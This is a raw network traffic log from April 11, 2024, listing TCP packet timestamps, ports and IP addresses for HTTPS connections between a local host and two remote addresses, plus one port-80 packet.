Apr 11, 2024 11:32:46.926950932 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.926955938 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.926985979 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.928802967 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.928826094 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.928889036 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.928894997 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.928906918 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.929843903 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.929888010 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.929939032 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.929944038 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.929955959 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.930866003 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.930886030 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.930932999 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.930936098 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.930953026 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.931953907 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.931974888 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.932017088 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.932020903 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.932044029 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.932807922 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.932830095 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.932864904 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.932869911 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.932888031 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.933926105 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.933943987 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.933984995 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.933990002 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.934000969 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.934911013 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.934931040 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.934974909 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.934981108 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.935005903 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.936502934 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.936522961 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.936553955 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.936559916 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.936584949 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.937349081 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.937375069 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.937403917 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.937408924 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.937427998 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.938532114 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.938551903 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.938606024 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.938611031 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.938625097 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.939333916 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.939353943 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.939402103 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.939407110 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.939419031 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.941066027 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.941085100 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.941131115 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.941134930 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.941154003 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.953994036 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.954019070 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.954061985 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.954068899 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.954090118 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.955024004 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.955044031 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.955092907 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.955097914 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.956259966 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.956288099 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.956324100 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.956327915 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.956351042 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.957307100 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.957324028 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.957379103 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.957382917 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.957396984 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.958175898 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.958194971 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.958251953 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.958257914 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.959181070 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.959202051 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.959244967 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.959249973 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.959285975 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.960460901 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.960525990 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.960556984 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.960561991 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.960578918 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.961462021 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.961479902 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.961529970 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.961533070 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.961549044 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.962452888 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.962474108 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.962521076 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.962527037 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.962536097 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.963378906 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.963397980 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.963454962 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.963459969 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.963474989 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.964760065 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.964780092 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.964828014 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.964833021 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.965759039 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.965779066 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.965817928 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.965821981 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.965843916 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.966747999 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.966768980 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.966809034 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.966814041 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.966844082 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.967827082 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.967847109 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.967880964 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.967885971 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.967910051 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.968516111 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.968537092 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.968568087 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.968581915 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.968590975 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.969938040 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.969958067 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.969991922 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.969996929 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.970021009 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.971028090 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.971048117 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.971091032 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.971097946 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.971107006 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.972008944 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.972028971 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.972064018 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.972069025 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.972090960 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.972982883 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.973002911 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.973037004 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.973046064 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.973056078 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.973742008 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.973761082 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.973817110 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.973823071 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.975455999 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.975475073 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.975507021 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.975512028 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.975538969 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.976066113 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.976089954 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.976119041 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.976124048 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.976146936 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.977073908 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.977092981 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.977144003 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.977149963 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.978739977 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.978756905 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.978821039 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.978825092 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.979749918 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.979784966 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.979810953 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.979815006 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.979836941 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.980761051 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.980802059 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.980827093 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.980832100 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.980854988 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.981580019 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.981599092 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.981651068 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.981657028 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.982954979 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.982970953 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.983025074 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.983028889 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.983047009 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.984016895 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.984035015 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.984083891 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.984091043 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.984941959 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.984960079 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.984997988 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.985002995 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.985028982 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.985872030 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.985892057 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.985924959 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.985933065 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.985948086 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.986813068 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.986830950 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.986882925 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.986886978 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.988274097 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.988301039 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.988327980 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.988332033 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.988353014 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.989305973 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.989325047 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.989353895 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.989357948 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.989377022 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.990186930 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.990205050 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.990236044 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.990241051 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.990262032 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.991235018 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.991251945 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.991282940 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.991287947 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.991305113 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.992238998 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.992259026 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.992290974 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.992295980 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.992324114 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.993639946 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.993658066 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.993697882 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.993705988 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.993715048 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.993719101 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.993765116 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.993767977 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.993799925 CEST	443	49721	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:46.993832111 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.993845940 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:46.999922991 CEST	49721	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:55.512423038 CEST	49717	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:32:55.631011963 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:55.631093979 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:55.631239891 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:55.638490915 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:55.638529062 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:55.818732023 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:55.818986893 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:55.820508957 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:55.820534945 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:55.820960045 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:55.865776062 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:55.888514996 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:55.932312012 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.048677921 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.048949957 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049042940 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049120903 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049170971 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.049200058 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049226999 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049273968 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.049312115 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.049341917 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049467087 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049534082 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.049551010 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049642086 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049715042 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.049730062 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049822092 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049889088 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.049901962 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.049998999 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050060987 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.050075054 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050170898 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050239086 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.050251007 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050349951 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050415993 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.050429106 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050520897 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050579071 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.050591946 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050693035 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050781965 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050802946 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.050817966 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.050947905 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051013947 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.051029921 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051090956 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.051250935 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051417112 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051485062 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.051497936 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051590919 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051676035 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051697016 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.051711082 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051825047 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051887989 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.051901102 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.051955938 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.052191973 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.052369118 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.052432060 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.052443981 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.052536011 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.052601099 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.052613974 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.052697897 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.052814007 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.052826881 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.053163052 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.053236008 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.053248882 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.053311110 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.131659985 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.131900072 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.133423090 CEST	443	49730	162.159.134.233	192.168.2.5
